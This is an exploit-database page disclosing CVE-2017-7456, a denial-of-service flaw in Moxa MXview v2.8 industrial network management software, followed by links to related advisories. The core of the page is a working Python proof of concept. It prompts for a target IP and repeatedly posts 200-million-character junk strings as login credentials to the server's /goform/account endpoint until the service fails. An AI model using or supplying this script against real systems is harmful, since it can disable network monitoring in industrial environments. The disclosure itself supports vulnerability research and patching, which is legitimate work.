Lucene search
Hyp3rlinx1337DAY-ID-27549HistoryApr 10, 2017 - 12:00 a.m.
Moxa MXview v2.8 Denial Of Service Exploit
2017-04-1000:00:00
hyp3rlinx
0day.today
43
0.134 Low
EPSS
Percentile
95.6%
Exploit for windows platform in category dos / poc
[+] Credits: John Page AKA hyp3rlinx
Vendor:
============
www.moxa.com
Product:
===========
MXView v2.8
Download:
http://www.moxa.com/product/MXstudio.htm
MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notificationβanytime, anywhere.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2017-7456
Security Issue:
================
Remote attackers can DOS MXView server by sending large string of junk characters for the user ID and password field login credentials.
Exploit/POC:
=============
import urllib,urllib2
print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'
IP=raw_input("[Moxa MXView IP]>")
PAYLOAD="A"*200000000
url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})
while 1:
req = urllib2.Request(url, data)
res = urllib2.urlopen(req)
print res
# 0day.today [2018-03-02] #Related
packetstorm
packetstorm
Moxa MXView 2.8 Denial Of Service
2017-04-10 00:00:00
cve
cve
CVE-2017-7456
2017-04-14 14:59:00
prion
prion
Design/Logic Flaw
2017-04-14 14:59:00
cvelist
cvelist
CVE-2017-7456
2017-04-14 14:00:00
checkpoint_advisories
checkpoint_advisories
Moxa MXView Denial of Service (CVE-2017-7456)
2022-10-31 00:00:00
exploitpack
exploitpack
Moxa MXview 2.8 - Denial of Service
2017-04-10 00:00:00
nvd
nvd
CVE-2017-7456
2017-04-14 14:59:00
exploitdb
exploitdb
Moxa MXview 2.8 - Denial of Service
2017-04-10 00:00:00
openvas
openvas
Moxa MXview < 2.9 Multiple Vulnerabilities (HTTP) - Active Check
2017-04-11 00:00:00